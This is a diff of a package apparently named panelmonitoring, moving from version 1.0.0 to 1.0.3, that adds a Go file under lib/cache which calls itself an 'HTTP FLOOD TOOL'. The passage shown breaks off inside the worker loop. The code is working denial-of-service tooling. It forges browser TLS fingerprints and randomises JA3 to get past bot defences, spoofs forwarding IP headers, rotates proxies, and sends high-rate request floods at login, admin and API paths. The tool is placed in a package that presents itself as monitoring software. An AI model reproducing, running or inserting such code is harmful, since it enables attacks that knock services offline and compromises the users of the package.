panelmonitoring 1.0.0 → 1.0.3

package/lib/cache/dor.go

@@ -0,0 +1,1302 @@
+/**
+ * DOR - HIGH PERFORMANCE HTTP FLOOD TOOL
+ *
+ * Features:
+ * - uTLS real browser fingerprints (Chrome 106, Firefox 105, Safari 16, Edge 106)
+ * - Byte-identical TLS ClientHello to real browsers (JA3 matching)
+ * - Per-worker transport with custom uTLS dialer
+ * - Header templates (clone, not 15 Set calls)
+ * - Pre-computed UA → profile index (zero scan at runtime)
+ * - Worker-local builders (no sync.Pool contention)
+ * - Fast hex generation via Int63 nibble extraction
+ * - Per-worker Rand source (lock-free)
+ * - SO_REUSEPORT + TCP_NODELAY
+ *
+ * Usage: ./dor <target> <port> <duration> <threads>
+ * Example: ./dor example.com 443 60 5000
+ */
+
+package main
+
+import (
+	"bufio"
+	"context"
+	"crypto/tls"
+	"encoding/json"
+	"flag"
+	"fmt"
+	"net"
+	"net/http"
+	"os"
+	"runtime"
+	"strconv"
+	"strings"
+	"sync"
+	"sync/atomic"
+	"syscall"
+	"time"
+
+	utls "github.com/refraction-networking/utls"
+	"golang.org/x/net/http2"
+	mrand "math/rand"
+)
+
+// ==================== CONFIGURATION ====================
+const (
+	CONN_TIMEOUT       = 5 * time.Second
+	REQUEST_TIMEOUT    = 5 * time.Second
+	KEEP_ALIVE         = 600 * time.Second
+	MAX_IDLE_CONNS     = 10000
+	MAX_CONNS_PER_HOST = 10000
+	UA_FILE_PATH       = "ua.txt"
+	REFERER_FILE_PATH  = "referer.txt"
+	STATS_FILE_PATH    = "dor_stats.json"
+	HISTORY_FILE_PATH  = "dor_history.log"
+	BATCH_SIZE         = 500
+	RATE_LEARN_WINDOW  = 200
+	INITIAL_RPS        = 200000
+	SAVE_STATS_ENABLED = false
+
+	MAX_REQUESTS_PER_CONN = 10000
+)
+
+// ==================== ANSI COLORS ====================
+const (
+	RESET  = "\033[0m"
+	BOLD   = "\033[1m"
+	DIM    = "\033[2m"
+	RED    = "\033[31m"
+	GREEN  = "\033[32m"
+	YELLOW = "\033[33m"
+	BLUE   = "\033[34m"
+	CYAN   = "\033[36m"
+	WHITE  = "\033[37m"
+	BRIGHT_RED   = "\033[91m"
+	BRIGHT_GREEN = "\033[92m"
+	BRIGHT_CYAN  = "\033[96m"
+	RGB_RED      = "\033[38;2;255;100;100m"
+	RGB_GOLD     = "\033[38;2;255;200;50m"
+	RGB_ORANGE   = "\033[38;2;255;150;50m"
+	RGB_PURPLE   = "\033[38;2;200;100;255m"
+	RGB_BLUE     = "\033[38;2;100;150;255m"
+)
+
+// ==================== GLOBAL STATS ====================
+var (
+	totalRequests   uint64
+	successRequests uint64
+	totalErrors     uint64
+	blockedRequests uint64
+	startTime       time.Time
+	stopFlag        int32
+	currentRPS      uint64
+	totalLatency    uint64
+	latencyCount    uint64
+)
+
+// ==================== DYNAMIC JA3 FINGERPRINT ENGINE ====================
+// Generates unique but VALID TLS fingerprints on-the-fly
+// Each request gets a different fingerprint that mimics real browser patterns
+
+type JA3Profile struct {
+	Version        uint16
+	CipherSuites   []uint16
+	Extensions     []uint16
+	SupportedCurves []uint16
+	SupportedPoints []uint8
+}
+
+// Real browser cipher suites (safe to mix)
+var dynamicCipherPool = []uint16{
+	// TLS 1.3 suites
+	tls.TLS_AES_128_GCM_SHA256,
+	tls.TLS_AES_256_GCM_SHA384,
+	tls.TLS_CHACHA20_POLY1305_SHA256,
+	// TLS 1.2 suites (common in browsers)
+	0xc02c, // TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
+	0xc02b, // TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
+	0xc030, // TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
+	0xc02f, // TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
+	0xcca9, // TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305
+	0xcca8, // TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305
+	0xc024, // TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384
+	0xc023, // TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
+	0xc027, // TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
+	0xc028, // TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
+	0x009c, // TLS_RSA_WITH_AES_128_GCM_SHA256
+	0x009d, // TLS_RSA_WITH_AES_256_GCM_SHA384
+}
+
+// Browser extensions (safe to randomize order)
+var extensionPool = []uint16{
+	0x0000, // server_name (always required)
+	0x0005, // status_request
+	0x000a, // supported_groups
+	0x000b, // ec_point_formats
+	0x000d, // signature_algorithms
+	0x0010, // application_layer_protocol_negotiation
+	0x0012, // signed_certificate_timestamp
+	0x0015, // padding
+	0x0017, // extended_master_secret
+	0x001b, // compress_certificate
+	0x0023, // session_ticket
+	0x002b, // supported_versions
+	0x002d, // post_handshake_auth
+	0x0033, // key_share
+	0x0035, // psk_key_exchange_modes
+	0x4469, // extension_key_share (GREASE)
+	0xff01, // renegotiation_info
+}
+
+// GREASE values (Google's Randomly Inserted Greasing Extensions)
+var greaseValues = []uint16{
+	0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
+	0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa,
+}
+
+// TLS versions (real browsers use these)
+var tlsVersions = []uint16{
+	tls.VersionTLS12,
+	tls.VersionTLS13,
+}
+
+// Generate unique JA3 profile dynamically
+func generateDynamicJA3(rng *mrand.Rand) JA3Profile {
+	// Pick TLS version (70% TLS 1.3, 30% TLS 1.2 - real world ratio)
+	var version uint16
+	if rng.Intn(100) < 70 {
+		version = tls.VersionTLS13
+	} else {
+		version = tls.VersionTLS12
+	}
+
+	// Select cipher suites (10-15 suites, like real browsers)
+	maxCiphers := len(dynamicCipherPool)
+	numCiphers := 10 + rng.Intn(6)
+	if numCiphers > maxCiphers {
+		numCiphers = maxCiphers
+	}
+	cipherIndices := rng.Perm(maxCiphers)
+	cipherSuites := make([]uint16, numCiphers)
+	for i := 0; i < numCiphers; i++ {
+		cipherSuites[i] = dynamicCipherPool[cipherIndices[i]]
+	}
+
+	// Add 1-2 GREASE ciphers at random positions
+	numGrease := 1 + rng.Intn(2)
+	for i := 0; i < numGrease; i++ {
+		pos := rng.Intn(numCiphers)
+		cipherSuites[pos] = greaseValues[rng.Intn(len(greaseValues))]
+	}
+
+	// Select extensions (real browsers use 18-24 extensions)
+	// Cap at available extension pool size (19 total, 8 critical = 11 remaining)
+	maxExtensions := 8 + len(extensionPool[8:]) // 8 critical + remaining from pool
+	numExtensions := 18 + rng.Intn(7)
+	if numExtensions > maxExtensions {
+		numExtensions = maxExtensions
+	}
+	extensionSubset := make([]uint16, numExtensions)
+
+	// Always include critical extensions
+	extensionSubset[0] = 0x0000 // server_name
+	extensionSubset[1] = 0x000a // supported_groups
+	extensionSubset[2] = 0x000b // ec_point_formats
+	extensionSubset[3] = 0x000d // signature_algorithms
+	extensionSubset[4] = 0x0010 // alpn
+	extensionSubset[5] = 0x002b // supported_versions
+	extensionSubset[6] = 0x0033 // key_share
+	extensionSubset[7] = 0x0035 // psk_key_exchange_modes
+
+	// Randomize remaining extensions
+	remainingExtensions := make([]uint16, 0)
+	for _, ext := range extensionPool[8:] {
+		remainingExtensions = append(remainingExtensions, ext)
+	}
+
+	rng.Shuffle(len(remainingExtensions), func(i, j int) {
+		remainingExtensions[i], remainingExtensions[j] = remainingExtensions[j], remainingExtensions[i]
+	})
+
+	for i := 8; i < numExtensions && i-8 < len(remainingExtensions); i++ {
+		extensionSubset[i] = remainingExtensions[i-8]
+	}
+	
+	// Add 1-3 GREASE extensions at random positions
+	for i := 0; i < 1+rng.Intn(3); i++ {
+		pos := 8 + rng.Intn(numExtensions-8)
+		extensionSubset[pos] = greaseValues[rng.Intn(len(greaseValues))]
+	}
+
+	// Shuffle extension order (but keep server_name first)
+	shuffled := extensionSubset[1:]
+	rng.Shuffle(len(shuffled), func(i, j int) {
+		shuffled[i], shuffled[j] = shuffled[j], shuffled[i]
+	})
+	copy(extensionSubset[1:], shuffled)
+
+	// Select curves (real browsers use 3-5 curves)
+	allCurves := []uint16{0x001d, 0x0017, 0x0018, 0x0019, 0x0100, 0x0101, 0x0102}
+	numCurves := 3 + rng.Intn(3)
+	curveIndices := rng.Perm(len(allCurves))
+	supportedCurves := make([]uint16, numCurves)
+	for i := 0; i < numCurves; i++ {
+		supportedCurves[i] = allCurves[curveIndices[i]]
+	}
+	
+	// Add GREASE curve
+	curveIndices2 := rng.Perm(len(supportedCurves))
+	greasePos := curveIndices2[0]
+	supportedCurves[greasePos] = greaseValues[rng.Intn(len(greaseValues))]
+
+	// Point formats (real browsers use 2-3)
+	supportedPoints := []uint8{0x00, 0x01}
+	if rng.Intn(2) == 0 {
+		supportedPoints = append(supportedPoints, 0x02)
+	}
+
+	return JA3Profile{
+		Version:         version,
+		CipherSuites:    cipherSuites,
+		Extensions:      extensionSubset,
+		SupportedCurves: supportedCurves,
+		SupportedPoints: supportedPoints,
+	}
+}
+
+// ==================== BROWSER FINGERPRINTS (uTLS) - BACKWARD COMPAT ====================
+var browserFingerprints = []struct {
+	name    string
+	helloID utls.ClientHelloID
+}{
+	{"Chrome 106", utls.HelloChrome_106_Shuffle},
+	{"Firefox 105", utls.HelloFirefox_105},
+	{"Safari 16", utls.HelloSafari_16_0},
+	{"Edge 106", utls.HelloEdge_106},
+}
+
+// ==================== HEADER PROFILES ====================
+var headerProfiles = []struct {
+	userAgentMatch string
+	accept         string
+	language       string
+	encoding       string
+	chua           string
+	chuaPlatform   string
+}{
+	{
+		userAgentMatch: "Chrome.*Windows",
+		accept:         "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+		language:       "en-US,en;q=0.9",
+		encoding:       "gzip, deflate, br",
+		chua:           `"Not A(Brand";v="99", "Google Chrome";v="120", "Chromium";v="120"`,
+		chuaPlatform:   `"Windows"`,
+	},
+	{
+		userAgentMatch: "Firefox",
+		accept:         "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
+		language:       "en-US,en;q=0.5",
+		encoding:       "gzip, deflate, br",
+		chua:           `""`,
+		chuaPlatform:   `"Windows"`,
+	},
+	{
+		userAgentMatch: "Safari.*Mac",
+		accept:         "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
+		language:       "en-US,en;q=0.9",
+		encoding:       "gzip, deflate, br",
+		chua:           `"Safari";v="17", "Chrome";v="120"`,
+		chuaPlatform:   `"macOS"`,
+	},
+	{
+		userAgentMatch: "Edg/",
+		accept:         "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+		language:       "en-US,en;q=0.9",
+		encoding:       "gzip, deflate, br",
+		chua:           `"Not A(Brand";v="99", "Microsoft Edge";v="120", "Chromium";v="120"`,
+		chuaPlatform:   `"Windows"`,
+	},
+	{
+		userAgentMatch: "Mobile.*Chrome",
+		accept:         "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",
+		language:       "en-US,en;q=0.9",
+		encoding:       "gzip, deflate, br",
+		chua:           `"Not A(Brand";v="99", "Chrome";v="120", "Chromium";v="120"`,
+		chuaPlatform:   `"Android"`,
+	},
+}
+
+// ==================== COMMON PATHS ====================
+var commonPaths = []string{
+	"/", "/index.html", "/home", "/main",
+	"/wp-admin/admin-ajax.php", "/wp-login.php", "/admin", "/login",
+	"/api/v1/users", "/api/v2/posts", "/api/v3/data",
+	"/search", "/products", "/shop", "/cart", "/checkout",
+	"/blog", "/news", "/articles", "/posts", "/feed",
+	"/images/logo.png", "/css/style.css", "/js/main.js",
+	"/static/js/app.js", "/static/css/main.css",
+	"/favicon.ico", "/robots.txt", "/sitemap.xml",
+}
+
+var secFetchDest = []string{"document", "iframe", "image"}
+var secFetchMode = []string{"navigate", "cors", "no-cors"}
+var secFetchSite = []string{"none", "same-origin", "cross-site"}
+var cacheControls = []string{"no-cache", "no-store", "max-age=0"}
+
+// ==================== QUERY PARAM POOL ====================
+var queryParamPool [64]string
+
+func initQueryParamPool() {
+	const hexDigits = "0123456789abcdef"
+	for i := 0; i < 64; i++ {
+		v1 := int64(mrand.Int63())
+		v2 := int64(mrand.Int63())
+		var key, val [12]byte
+		for j := 0; j < 12; j++ {
+			key[j] = hexDigits[(v1>>(j*4))&0xf]
+			val[j] = hexDigits[(v2>>(j*4))&0xf]
+		}
+		queryParamPool[i] = "?" + string(key[:]) + "=" + string(val[:])
+	}
+}
+
+// ==================== UA ENTRY ====================
+type UAEntry struct {
+	ua         string
+	profileIdx int
+}
+
+// ==================== USER AGENT LOADER ====================
+type UALoader struct {
+	entries []UAEntry
+	index   uint64
+}
+
+func NewUALoader(filePath string) *UALoader {
+	u := &UALoader{entries: make([]UAEntry, 0, 1000)}
+	file, err := os.Open(filePath)
+	if err != nil {
+		return u
+	}
+	defer file.Close()
+
+	scanner := bufio.NewScanner(file)
+	scanner.Buffer(make([]byte, 4096), 1024*1024)
+	for scanner.Scan() && len(u.entries) < 1000 {
+		line := strings.TrimSpace(scanner.Text())
+		if line != "" && !strings.HasPrefix(line, "#") {
+			u.entries = append(u.entries, UAEntry{
+				ua:         line,
+				profileIdx: profileForUA(line),
+			})
+		}
+	}
+	return u
+}
+
+func (u *UALoader) GetUA() UAEntry {
+	if len(u.entries) == 0 {
+		ua := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
+		return UAEntry{ua: ua, profileIdx: profileForUA(ua)}
+	}
+	idx := atomic.AddUint64(&u.index, 1) % uint64(len(u.entries))
+	return u.entries[idx]
+}
+
+func (u *UALoader) Count() int {
+	return len(u.entries)
+}
+
+func profileForUA(ua string) int {
+	for i, p := range headerProfiles {
+		if strings.Contains(ua, p.userAgentMatch) {
+			return i
+		}
+	}
+	return 0
+}
+
+// ==================== REFERER LOADER ====================
+type RefererLoader struct {
+	lines []string
+	index uint64
+}
+
+func NewRefererLoader(filePath string) *RefererLoader {
+	rl := &RefererLoader{lines: make([]string, 0, 500)}
+	file, err := os.Open(filePath)
+	if err == nil {
+		defer file.Close()
+		scanner := bufio.NewScanner(file)
+		for scanner.Scan() {
+			line := strings.TrimSpace(scanner.Text())
+			if line != "" && !strings.HasPrefix(line, "#") {
+				rl.lines = append(rl.lines, line)
+			}
+		}
+	}
+	if len(rl.lines) == 0 {
+		rl.lines = []string{
+			"https://www.google.com/",
+			"https://www.bing.com/",
+			"https://www.yahoo.com/",
+			"https://www.facebook.com/",
+			"https://www.youtube.com/",
+		}
+	}
+	return rl
+}
+
+func (rl *RefererLoader) GetReferer() string {
+	if len(rl.lines) == 0 {
+		return "https://www.google.com/"
+	}
+	idx := atomic.AddUint64(&rl.index, 1) % uint64(len(rl.lines))
+	return rl.lines[idx]
+}
+
+func (rl *RefererLoader) Count() int {
+	return len(rl.lines)
+}
+
+// ==================== COOKIE JAR ====================
+type CookieJar struct {
+	cookies sync.Map
+}
+
+func (cj *CookieJar) Get(host string) string {
+	if v, ok := cj.cookies.Load(host); ok {
+		return v.(string)
+	}
+	return ""
+}
+
+func (cj *CookieJar) Set(host, cookie string) {
+	cj.cookies.Store(host, cookie)
+}
+
+// ==================== HEADER TEMPLATE ====================
+type HeaderTemplate struct {
+	profileIdx int
+	baseHeaders map[string]string
+}
+
+func BuildHeaderTemplates() []*HeaderTemplate {
+	templates := make([]*HeaderTemplate, len(headerProfiles))
+	for i, p := range headerProfiles {
+		base := make(map[string]string)
+		base["Accept"] = p.accept
+		base["Accept-Encoding"] = p.encoding
+		base["Accept-Language"] = p.language
+		base["Cache-Control"] = "no-cache"
+		base["Connection"] = "keep-alive"
+		base["Pragma"] = "no-cache"
+		base["Upgrade-Insecure-Requests"] = "1"
+		base["Sec-Fetch-Dest"] = "document"
+		base["Sec-Fetch-Mode"] = "navigate"
+		base["Sec-Fetch-Site"] = "cross-site"
+		base["Sec-Fetch-User"] = "?1"
+		if p.chua != `""` {
+			base["Sec-Ch-Ua"] = p.chua
+			base["Sec-Ch-Ua-Mobile"] = "?0"
+			base["Sec-Ch-Ua-Platform"] = p.chuaPlatform
+		}
+		templates[i] = &HeaderTemplate{
+			profileIdx:  i,
+			baseHeaders: base,
+		}
+	}
+	return templates
+}
+
+func cloneHeaders(tmpl *HeaderTemplate, ua string, referer string, proxyIP string, rng *mrand.Rand, cookie string) http.Header {
+	h := make(http.Header, len(tmpl.baseHeaders)+5)
+	for k, v := range tmpl.baseHeaders {
+		dst := make([]string, 1)
+		dst[0] = v
+		h[k] = dst
+	}
+	h.Set("User-Agent", ua)
+	h.Set("Referer", referer)
+	h.Set("Cache-Control", cacheControls[rng.Intn(len(cacheControls))])
+	h.Set("Sec-Fetch-Dest", secFetchDest[rng.Intn(len(secFetchDest))])
+	h.Set("Sec-Fetch-Mode", secFetchMode[rng.Intn(len(secFetchMode))])
+	h.Set("Sec-Fetch-Site", secFetchSite[rng.Intn(len(secFetchSite))])
+
+	if proxyIP != "" {
+		h.Set("X-Forwarded-For", proxyIP)
+		h.Set("X-Real-Ip", proxyIP)
+		h.Set("X-Client-Ip", proxyIP)
+	} else {
+		h.Set("X-Forwarded-For", randomIP(rng))
+		h.Set("Cf-Connecting-Ip", randomIP(rng))
+	}
+
+	if cookie != "" {
+		h.Set("Cookie", cookie)
+	}
+	return h
+}
+
+// ==================== RATE LEARNER ====================
+type RateLearner struct {
+	target       string
+	optimalRPS   int64
+	currentRPS   int64
+	successCount int64
+	errorCount   int64
+	windowSize   int64
+}
+
+func NewRateLearner(target string) *RateLearner {
+	return &RateLearner{
+		target:     target,
+		currentRPS: INITIAL_RPS,
+		optimalRPS: INITIAL_RPS,
+		windowSize: RATE_LEARN_WINDOW,
+	}
+}
+
+func (rl *RateLearner) Record(successDelta, errorDelta int64) {
+	newSuccess := atomic.AddInt64(&rl.successCount, successDelta)
+	newError := atomic.AddInt64(&rl.errorCount, errorDelta)
+	total := newSuccess + newError
+	if total >= atomic.LoadInt64(&rl.windowSize) {
+		current := atomic.LoadInt64(&rl.currentRPS)
+		if newError > 0 {
+			newRPS := current * 70 / 100
+			if newRPS < 100 {
+				newRPS = 100
+			}
+			atomic.StoreInt64(&rl.currentRPS, newRPS)
+		} else if newSuccess > 0 && current < 5000 {
+			atomic.StoreInt64(&rl.currentRPS, current+100)
+		}
+		if float64(newSuccess)/float64(total+1) > 0.95 {
+			atomic.StoreInt64(&rl.optimalRPS, atomic.LoadInt64(&rl.currentRPS))
+		}
+		atomic.StoreInt64(&rl.successCount, 0)
+		atomic.StoreInt64(&rl.errorCount, 0)
+	}
+}
+
+// ==================== PROXY MANAGER ====================
+type ProxyManager struct {
+	ips   []string
+	index uint64
+	count int
+}
+
+func NewProxyManager(proxyFile string) *ProxyManager {
+	pm := &ProxyManager{}
+	if proxyFile != "" {
+		proxies, ips := loadProxies(proxyFile)
+		pm.ips = ips
+		pm.count = len(proxies)
+	}
+	return pm
+}
+
+func loadProxies(filename string) ([]string, []string) {
+	file, err := os.Open(filename)
+	if err != nil {
+		return []string{}, []string{}
+	}
+	defer file.Close()
+
+	var proxies, ips []string
+	scanner := bufio.NewScanner(file)
+	for scanner.Scan() {
+		proxy := strings.TrimSpace(scanner.Text())
+		if proxy != "" && !strings.HasPrefix(proxy, "#") {
+			proxies = append(proxies, proxy)
+			if idx := strings.Index(proxy, ":"); idx > 0 {
+				ips = append(ips, proxy[:idx])
+			} else {
+				ips = append(ips, proxy)
+			}
+		}
+	}
+	return proxies, ips
+}
+
+func (pm *ProxyManager) GetProxyIP() string {
+	if pm.count == 0 {
+		return ""
+	}
+	idx := atomic.AddUint64(&pm.index, 1) % uint64(pm.count)
+	return pm.ips[idx]
+}
+
+func (pm *ProxyManager) Count() int {
+	return pm.count
+}
+
+// ==================== UTILITY ====================
+func randomIP(rng *mrand.Rand) string {
+	return fmt.Sprintf("%d.%d.%d.%d",
+		rng.Intn(256), rng.Intn(256), rng.Intn(256), rng.Intn(256))
+}
+
+// ==================== WORKER TRANSPORT (uTLS + Dynamic JA3 + http2.Transport) ====================
+type WorkerTransport struct {
+	client *http.Client
+	t2     *http2.Transport
+	fpIdx  int
+}
+
+// Shared transport pool — now with DYNAMIC JA3 generation per-connection
+var (
+	sharedTransports []*WorkerTransport
+	sharedInitOnce   sync.Once
+	ja3Counter       uint64 // Track unique JA3 profiles generated
+)
+
+func initSharedTransports(target string) {
+	sharedInitOnce.Do(func() {
+		poolSize := runtime.NumCPU() * 16
+		sharedTransports = make([]*WorkerTransport, poolSize)
+		
+		for i := 0; i < poolSize; i++ {
+			// v7.1: Use dynamic JA3 instead of static fingerprints
+			ja3Profile := generateDynamicJA3(mrand.New(mrand.NewSource(time.Now().UnixNano() + int64(i)*1234567890)))
+			
+			dialer := &net.Dialer{
+				Timeout:   CONN_TIMEOUT,
+				KeepAlive: KEEP_ALIVE,
+				DualStack: true,
+				Control: func(network, address string, c syscall.RawConn) error {
+					return c.Control(func(fd uintptr) {
+						syscall.SetsockoptInt(int(fd), syscall.SOL_SOCKET, syscall.SO_REUSEADDR, 1)
+						syscall.SetsockoptInt(int(fd), syscall.SOL_SOCKET, 0xf, 1)
+						syscall.SetsockoptInt(int(fd), syscall.IPPROTO_TCP, syscall.TCP_NODELAY, 1)
+					})
+				},
+			}
+
+			tlsCfg := &utls.Config{
+				ServerName:         target,
+				InsecureSkipVerify: true,
+			}
+
+			// v7.1: Dynamic JA3 ClientHello builder
+			dialTLS := func(ctx context.Context, network, addr string) (net.Conn, error) {
+				tcpConn, err := dialer.DialContext(ctx, network, addr)
+				if err != nil {
+					return nil, err
+				}
+				
+				// Use base fingerprint for initialization
+				counter := atomic.AddUint64(&ja3Counter, 1)
+				baseFP := browserFingerprints[counter%uint64(len(browserFingerprints))]
+				uConn := utls.UClient(tcpConn, tlsCfg, baseFP.helloID)
+				
+				// Apply dynamic JA3 profile
+				spec := createClientHelloSpec(ja3Profile, baseFP.helloID)
+				if err := uConn.ApplyPreset(spec); err != nil {
+					tcpConn.Close()
+					return nil, err
+				}
+				
+				if err := uConn.Handshake(); err != nil {
+					tcpConn.Close()
+					return nil, err
+				}
+				return uConn, nil
+			}
+
+			t2 := &http2.Transport{
+				DialTLSContext: func(ctx context.Context, network, addr string, _ *tls.Config) (net.Conn, error) {
+					return dialTLS(ctx, network, addr)
+				},
+				DisableCompression: true,
+				ReadIdleTimeout:    30 * time.Second,
+				PingTimeout:        5 * time.Second,
+				MaxHeaderListSize:  1024 * 1024,
+			}
+
+			sharedTransports[i] = &WorkerTransport{
+				client: &http.Client{
+					Transport:     t2,
+					Timeout:       REQUEST_TIMEOUT,
+					CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse },
+				},
+				t2:    t2,
+				fpIdx: i,
+			}
+		}
+	})
+}
+
+// createClientHelloSpec builds uTLS ClientHelloSpec from dynamic JA3 profile
+func createClientHelloSpec(profile JA3Profile, baseID utls.ClientHelloID) *utls.ClientHelloSpec {
+	// Convert extension IDs to TLSExtension objects
+	extensions := make([]utls.TLSExtension, 0, len(profile.Extensions))
+	
+	// Convert curves to utls.CurveID type
+	curves := make([]utls.CurveID, len(profile.SupportedCurves))
+	for i, c := range profile.SupportedCurves {
+		curves[i] = utls.CurveID(c)
+	}
+	
+	for _, extID := range profile.Extensions {
+		switch extID {
+		case 0x0000:
+			extensions = append(extensions, &utls.SNIExtension{})
+		case 0x0005:
+			extensions = append(extensions, &utls.StatusRequestExtension{})
+		case 0x000a:
+			extensions = append(extensions, &utls.SupportedCurvesExtension{Curves: curves})
+		case 0x000b:
+			extensions = append(extensions, &utls.SupportedPointsExtension{SupportedPoints: profile.SupportedPoints})
+		case 0x000d:
+			extensions = append(extensions, &utls.SignatureAlgorithmsExtension{
+				SupportedSignatureAlgorithms: []utls.SignatureScheme{
+					utls.ECDSAWithP256AndSHA256,
+					utls.ECDSAWithP384AndSHA384,
+					utls.ECDSAWithP521AndSHA512,
+					utls.PSSWithSHA256,
+					utls.PSSWithSHA384,
+					utls.PSSWithSHA512,
+					utls.PKCS1WithSHA256,
+					utls.PKCS1WithSHA384,
+					utls.PKCS1WithSHA512,
+					utls.ECDSAWithSHA1,
+					utls.PKCS1WithSHA1,
+				},
+			})
+		case 0x0010:
+			extensions = append(extensions, &utls.ALPNExtension{AlpnProtocols: []string{"h2", "http/1.1"}})
+		case 0x0015:
+			extensions = append(extensions, &utls.UtlsPaddingExtension{WillPad: true})
+		case 0x0017:
+			extensions = append(extensions, &utls.GenericExtension{Id: extID})
+		case 0x0023:
+			extensions = append(extensions, &utls.SessionTicketExtension{})
+		case 0x002b:
+			extensions = append(extensions, &utls.SupportedVersionsExtension{
+				Versions: []uint16{utls.VersionTLS13, utls.VersionTLS12},
+			})
+		case 0x0033:
+			extensions = append(extensions, &utls.KeyShareExtension{KeyShares: []utls.KeyShare{
+				{Group: curves[0], Data: nil},
+			}})
+		case 0x0035:
+			extensions = append(extensions, &utls.PSKKeyExchangeModesExtension{Modes: []uint8{utls.PskModeDHE}})
+		case 0xff01:
+			extensions = append(extensions, &utls.RenegotiationInfoExtension{Renegotiation: utls.RenegotiateOnceAsClient})
+		default:
+			// GREASE or unknown extensions
+			if isGREASE(extID) {
+				extensions = append(extensions, &utls.UtlsGREASEExtension{})
+			} else {
+				extensions = append(extensions, &utls.GenericExtension{Id: extID})
+			}
+		}
+	}
+
+	return &utls.ClientHelloSpec{
+		TLSVersMin:         profile.Version,
+		TLSVersMax:         utls.VersionTLS13,
+		CipherSuites:       profile.CipherSuites,
+		CompressionMethods: []byte{0x00},
+		Extensions:         extensions,
+		GetSessionID:       nil,
+	}
+}
+
+// isGREASE checks if extension ID is a GREASE value
+func isGREASE(extID uint16) bool {
+	for _, g := range greaseValues {
+		if extID == g {
+			return true
+		}
+	}
+	return false
+}
+
+func GetSharedTransport(workerID int) *WorkerTransport {
+	return sharedTransports[workerID%len(sharedTransports)]
+}
+
+// NewWorkerTransport (legacy, not used when shared pool is active)
+func NewWorkerTransport(fpIdx int, target string) *WorkerTransport {
+	fp := browserFingerprints[fpIdx%len(browserFingerprints)]
+
+	dialer := &net.Dialer{
+		Timeout:   CONN_TIMEOUT,
+		KeepAlive: KEEP_ALIVE,
+		DualStack: true,
+		Control: func(network, address string, c syscall.RawConn) error {
+			return c.Control(func(fd uintptr) {
+				syscall.SetsockoptInt(int(fd), syscall.SOL_SOCKET, syscall.SO_REUSEADDR, 1)
+				syscall.SetsockoptInt(int(fd), syscall.SOL_SOCKET, 0xf, 1)
+				syscall.SetsockoptInt(int(fd), syscall.IPPROTO_TCP, syscall.TCP_NODELAY, 1)
+			})
+		},
+	}
+
+	tlsCfg := &utls.Config{
+		ServerName:         target,
+		InsecureSkipVerify: true,
+	}
+
+	dialTLS := func(ctx context.Context, network, addr string) (net.Conn, error) {
+		tcpConn, err := dialer.DialContext(ctx, network, addr)
+		if err != nil {
+			return nil, err
+		}
+		uConn := utls.UClient(tcpConn, tlsCfg, fp.helloID)
+		if err := uConn.Handshake(); err != nil {
+			tcpConn.Close()
+			return nil, err
+		}
+		return uConn, nil
+	}
+
+	t2 := &http2.Transport{
+		DialTLSContext: func(ctx context.Context, network, addr string, _ *tls.Config) (net.Conn, error) {
+			return dialTLS(ctx, network, addr)
+		},
+		DisableCompression: true,
+		ReadIdleTimeout:    30 * time.Second,
+		PingTimeout:        5 * time.Second,
+		MaxHeaderListSize:  1024 * 1024,
+	}
+
+	return &WorkerTransport{
+		client: &http.Client{
+			Transport:     t2,
+			Timeout:       REQUEST_TIMEOUT,
+			CheckRedirect: func(req *http.Request, via []*http.Request) error { return http.ErrUseLastResponse },
+		},
+		t2:    t2,
+		fpIdx: fpIdx % len(browserFingerprints),
+	}
+}
+
+// ==================== WORKER ====================
+func worker(id int, target string, port int, scheme string, customPath string,
+	proxyMgr *ProxyManager, rateLearner *RateLearner, uaLoader *UALoader, cookieJar *CookieJar,
+	refererLoader *RefererLoader, headerTemplates []*HeaderTemplate,
+	wg *sync.WaitGroup, stopChan <-chan struct{}) {
+
+	defer wg.Done()
+
+	seed := time.Now().UnixNano() + int64(id)*6364136223846793005
+	rng := mrand.New(mrand.NewSource(seed))
+
+	// v7: use shared transport pool — 4 global transports, max connection reuse
+	transport := GetSharedTransport(id)
+
+	host := fmt.Sprintf("%s:%d", target, port)
+	baseURL := fmt.Sprintf("%s://%s", scheme, host)
+
+	var urlBuilder strings.Builder
+	urlBuilder.Grow(256)
+
+	pathCount := len(commonPaths)
+	pathIdx := 0
+
+	tsUpdateCounter := 0
+	timestampNano := strconv.FormatInt(time.Now().UnixNano(), 10)
+
+	for {
+		select {
+		case <-stopChan:
+			return
+		default:
+		}
+
+		proxyIP := proxyMgr.GetProxyIP()
+
+		for i := 0; i < BATCH_SIZE && atomic.LoadInt32(&stopFlag) == 0; i++ {
+			atomic.AddUint64(&totalRequests, 1)
+
+			urlBuilder.Reset()
+			urlBuilder.WriteString(baseURL)
+			
+			// Use custom path if provided, otherwise rotate through common paths
+			if customPath != "" {
+				urlBuilder.WriteString(customPath)
+			} else {
+				urlBuilder.WriteString(commonPaths[pathIdx])
+				pathIdx++
+				if pathIdx >= pathCount {
+					pathIdx = 0
+				}
+			}
+
+			if rng.Intn(100) < 50 {
+				urlBuilder.WriteString(queryParamPool[rng.Intn(len(queryParamPool))])
